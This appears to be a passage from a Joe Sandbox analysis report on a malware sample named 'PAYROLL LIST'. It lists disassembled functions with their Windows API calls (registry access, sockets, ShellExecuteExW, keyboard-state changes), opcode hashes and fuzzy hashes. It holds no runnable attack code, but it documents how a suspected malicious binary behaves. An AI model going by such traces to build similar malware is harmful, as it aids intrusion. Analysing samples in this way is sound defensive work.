Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 8cf8bc3e0f249d39579cfc4f581c47561e541eb1ef97bed3d66fb691b3523639
Instruction ID: 56f8656034ec5fb4d5931960903d7b8bffc6e175c8f768e2689b3bd98e0b918a
Opcode Fuzzy Hash: 8cf8bc3e0f249d39579cfc4f581c47561e541eb1ef97bed3d66fb691b3523639
Instruction Fuzzy Hash: BD11EB36A09B42BAEB055B649C82D6B77FCAF15310F20003AF641A7681E7B0AA006A65

Function 00A6A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00A6A806

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: d33c13447f463a99bf42ae6eca837a9437b8a0d8b8b9b7a31b74ebeb4e5a5c9a
Instruction ID: 3f9d3fb4f0eb27316e3b98b0f291e3d7e3990fa19dfe2c905527b0021ad14430
Opcode Fuzzy Hash: d33c13447f463a99bf42ae6eca837a9437b8a0d8b8b9b7a31b74ebeb4e5a5c9a
Instruction Fuzzy Hash: 75C17D75A0421ADFDB04CF98C581BAEB7F4FF29315F20806AE656E7281D734AA41CF91

Function 00A66B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A66B63
LoadStringW.USER32(00000000), ref: 00A66B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A66B80
LoadStringW.USER32(00000000), ref: 00A66B87
_wprintf.LIBCMT ref: 00A66BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A66BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00A66BA8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: a79ce14c0f23e309430b647e71cfe8b557c6d39b1ccc5b781bf30f81496bfebb
Instruction ID: 47e7e995f1c219192c383df528ea3f21c817190680df52a5f48269d0b4ecb8bb
Opcode Fuzzy Hash: a79ce14c0f23e309430b647e71cfe8b557c6d39b1ccc5b781bf30f81496bfebb
Instruction Fuzzy Hash: DA016DF6900209BFEB11EBE49D89EE6376CE709304F0044A1B786E6081EB749E858B70

Function 00A82B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A82BB5,?,?), ref: 00A83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A82BF6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: b4d80bd8640b2173610c1f0616866236e84cdbfa8887df7237d6bd978930cdfd
Instruction ID: 62534973161831f611103b772378e8961badd215d650a59e237dc57a580e2baa
Opcode Fuzzy Hash: b4d80bd8640b2173610c1f0616866236e84cdbfa8887df7237d6bd978930cdfd
Instruction Fuzzy Hash: 9A9136752042019FCB10EF58D995B7EBBE5FF88310F04881DF9969B2A2DB34E946CB42

Function 00A795BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00A79691
WSAGetLastError.WSOCK32(00000000), ref: 00A7969E
__WSAFDIsSet.WSOCK32(00000000,?), ref: 00A796C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A796E9
WSAGetLastError.WSOCK32(00000000), ref: 00A796F8
htons.WSOCK32(?), ref: 00A797AA
inet_ntoa.WSOCK32(?), ref: 00A79765

Part of subcall function 00A5D2FF: _strlen.LIBCMT ref: 00A5D309

_strlen.LIBCMT ref: 00A79800

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: 82baa164de5cfad1de561952f537c647913d7b859f946bfe2f1c7b38f2317c7b
Instruction ID: f1286edc25dc24d9f43133f91939ae87f6568d3b63c2d166f41c5adc54c8d9a3
Opcode Fuzzy Hash: 82baa164de5cfad1de561952f537c647913d7b859f946bfe2f1c7b38f2317c7b
Instruction Fuzzy Hash: 4981C131504240ABC714EF68DD85E6FB7F8EF89710F108A2EF5599B292EB30D905CB92

Function 00A4A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00A4A991

Part of subcall function 00A47D7C: __FF_MSGBANNER.LIBCMT ref: 00A47D91
Part of subcall function 00A47D7C: __NMSG_WRITE.LIBCMT ref: 00A47D98
Part of subcall function 00A47D7C: __malloc_crt.LIBCMT ref: 00A47DB8

__lock.LIBCMT ref: 00A4A9A4
__lock.LIBCMT ref: 00A4A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00AD6DE0,00000018,00A55E7B,?,00000000,00000109), ref: 00A4AA0C
EnterCriticalSection.KERNEL32(8000000C,00AD6DE0,00000018,00A55E7B,?,00000000,00000109), ref: 00A4AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 00A4AA39

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 18784e25910e6804baad8dea502f7a9da63e6b902b4e918a39c709fc184693cf
Instruction ID: 0c4c4c8410f52bb2e8434599838fca39c6f93e9db9aabd277d654685c11a1975
Opcode Fuzzy Hash: 18784e25910e6804baad8dea502f7a9da63e6b902b4e918a39c709fc184693cf
Instruction Fuzzy Hash: 96418079A406419BEB10CFA8CA8075CB7B0BF91375F108338E425AF2D2D7B49C41CB92

Function 00A88ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A88EE4
GetDC.USER32(00000000), ref: 00A88EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A88EF7
ReleaseDC.USER32(00000000,00000000), ref: 00A88F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00A88F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A88F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A8BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00A88F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A88FAA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 26e9edf1a1159376a66a0484cbdfeb5cdeaec7c6c74cad33beb80121bffd552a
Instruction ID: 3f853af8a24cb2cd092b5d559c785f2d61984cd657601cc11c705b6df33f7003
Opcode Fuzzy Hash: 26e9edf1a1159376a66a0484cbdfeb5cdeaec7c6c74cad33beb80121bffd552a
Instruction Fuzzy Hash: B3316D72200214BFEB119F90CC49FEA3BAAEF4A715F044065FE4A9A191CB759C42CB70

Function 00A716DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

Part of subcall function 00A3C6F4: _wcscpy.LIBCMT ref: 00A3C717

_wcstok.LIBCMT ref: 00A7184E
_wcscpy.LIBCMT ref: 00A718DD
_memset.LIBCMT ref: 00A71910

Strings

X, xrefs: 00A71948

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: c1e49c6d5adf3f9d33a03402b2c40eac9bef8dc45d095cdd2742bd62bcc77bfa
Instruction ID: 8c0edec7817da3f17305cded5d3fc3c46ad2030fb3d04aaa2a240abfe6cd7e28
Opcode Fuzzy Hash: c1e49c6d5adf3f9d33a03402b2c40eac9bef8dc45d095cdd2742bd62bcc77bfa
Instruction Fuzzy Hash: 2EC170315043509FC724EF28DA91A9EB7E4FF85350F00896DF99A972A2DB30ED05CB82

Function 00A90133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

GetSystemMetrics.USER32(0000000F), ref: 00A9016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00A9038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A903AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 00A903D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A903FF
ShowWindow.USER32(00000003,00000000), ref: 00A90421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00A90440

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 7d53ab362f2d4d2d5ebfc88c9be8be39f5de2faa35b20c463c53172c5064a742
Instruction ID: b345ec9ea291935a870bf17d39c8334aa1c2fa71019df8ddee6af8952f4ed500
Opcode Fuzzy Hash: 7d53ab362f2d4d2d5ebfc88c9be8be39f5de2faa35b20c463c53172c5064a742
Instruction Fuzzy Hash: 79A18B35700616AFDF18CF68C989BBEBBF1BF48780F148115E995AA290D734AD51CB90

Function 00A3AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271990f16425853a6dce8165414e6e0130d074471e15a0bbf4d4d8e631abaffa
Instruction ID: 3daa3ecef9656e3b5ba412ed4a4d8e9a718bae8049903ed36466c39eb5de9969
Opcode Fuzzy Hash: 271990f16425853a6dce8165414e6e0130d074471e15a0bbf4d4d8e631abaffa
Instruction Fuzzy Hash: FD716DB1A00119EFCF14CF98CC89AAEBB79FF85314F248149F956AB251C730AA41CF61

Function 00A82230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A8225A
_memset.LIBCMT ref: 00A82323
ShellExecuteExW.SHELL32(?), ref: 00A82368

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

Part of subcall function 00A3C6F4: _wcscpy.LIBCMT ref: 00A3C717

CloseHandle.KERNEL32(00000000), ref: 00A8242F
FreeLibrary.KERNEL32(00000000), ref: 00A8243E

Strings

@, xrefs: 00A82334

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 979d790a796431c3373d9db29ea63da9ae7811c74623b71365a06e97194aeff5
Instruction ID: 101dc79c98e33465fd6df3c25deab97fd092099a4c64757e3b31d15962dfc392
Opcode Fuzzy Hash: 979d790a796431c3373d9db29ea63da9ae7811c74623b71365a06e97194aeff5
Instruction Fuzzy Hash: A7716174900619DFCF05EF98D991AAEB7F5FF48310F108469E856AB391DB34AD40CB94

Function 00A63DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A63DE7
GetKeyboardState.USER32(?), ref: 00A63DFC
SetKeyboardState.USER32(?), ref: 00A63E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00A63E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00A63EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00A63EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A63F13

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9c4120d3cb5325468029c560263f49c19021ee93180cc28d3c49ad2a624f8599
Instruction ID: cbb7cb85a4f605a20070beeeaf1da982cc5a062192595e98044017f7bf0fc9b2
Opcode Fuzzy Hash: 9c4120d3cb5325468029c560263f49c19021ee93180cc28d3c49ad2a624f8599
Instruction Fuzzy Hash: FA51C3A1A047D53DFF3643248C45BBA7EF95B06304F088589E1D54A8C3D3A5AEC6D760

Function 00A63BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00A63C02
GetKeyboardState.USER32(?), ref: 00A63C17
SetKeyboardState.USER32(?), ref: 00A63C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A63CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A63CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A63D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A63D26

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 92d736ef31808d5490ef81ac8e53cebae8aaa73b312be4d4894d02806d5464ff
Instruction ID: c7a0ce1087eea9d96a3c5e2121331d7b316b4b0075a6dd0f1b2fbd996dc4894c
Opcode Fuzzy Hash: 92d736ef31808d5490ef81ac8e53cebae8aaa73b312be4d4894d02806d5464ff
Instruction Fuzzy Hash: F35107A29047D53DFF3287348C45BBABFB99B06300F088988F1D5568C2D394EE8AD750

Function 00A67DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00A67DBE
_wcsncpy.LIBCMT ref: 00A67DF3
_wcsncpy.LIBCMT ref: 00A67E25
_wcsncpy.LIBCMT ref: 00A67E58
_wcsncpy.LIBCMT ref: 00A67E9A
_wcsncpy.LIBCMT ref: 00A67ED4
_wcsncpy.LIBCMT ref: 00A67F03

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 98414f01c7bc3617aaddef529d8f0b4f6740185ce7e06dbd189ef6356e4e5c77
Instruction ID: ed09c4023c2a58506749ce63f903de4df8ea8a91c728740bb7e9f2815aabe811
Opcode Fuzzy Hash: 98414f01c7bc3617aaddef529d8f0b4f6740185ce7e06dbd189ef6356e4e5c77
Instruction Fuzzy Hash: 11417E6AC20214B6CB10EBF4C886ECFB7BCAF85710F508966E514E3121FA74E664C7A5

Function 00A83D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00A83DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A83DCB
FreeLibrary.KERNEL32(00000000), ref: 00A83E80

Part of subcall function 00A83D72: RegCloseKey.ADVAPI32(?), ref: 00A83DE8
Part of subcall function 00A83D72: FreeLibrary.KERNEL32(?), ref: 00A83E3A
Part of subcall function 00A83D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A83E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A83E25

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 5549f7f04a7f0820c735a5751700cd118a76a586b815f19e3dd6c26aa7c13527
Instruction ID: ae061c602169e36a624e2fcec53b3171fedbb3f3a6e915b0a7e0473728e90bb0
Opcode Fuzzy Hash: 5549f7f04a7f0820c735a5751700cd118a76a586b815f19e3dd6c26aa7c13527
Instruction Fuzzy Hash: 7331D8B2901109BFDF15EBD4DC89AFFB7BCEB09700F00456AE552A2190D7749E499BA0

Function 00A88FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A88FE7
GetWindowLongW.USER32(00B7E848,000000F0), ref: 00A8901A
GetWindowLongW.USER32(00B7E848,000000F0), ref: 00A8904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A89081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A890AB
GetWindowLongW.USER32(00000000,000000F0), ref: 00A890BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A890D6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 1bbaf6f4e60ad865485d7138b92b581464f001d833317678b3c3c8439cf7a5cd
Instruction ID: ea34588634077ae7b4d02662cae909a9d9bf80870b5b1bfa19eb67a3359252f5
Opcode Fuzzy Hash: 1bbaf6f4e60ad865485d7138b92b581464f001d833317678b3c3c8439cf7a5cd
Instruction Fuzzy Hash: F3311374600225AFDB21DF98DC84F6637B5FB4A714F180164F65A8F2B1CBB1AC41DB41

Function 00A608AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A608F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A60918
SysAllocString.OLEAUT32(00000000), ref: 00A6091B
SysAllocString.OLEAUT32(?), ref: 00A60939
SysFreeString.OLEAUT32(?), ref: 00A60942
StringFromGUID2.OLE32(?,?,00000028), ref: 00A60967
SysAllocString.OLEAUT32(?), ref: 00A60975

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
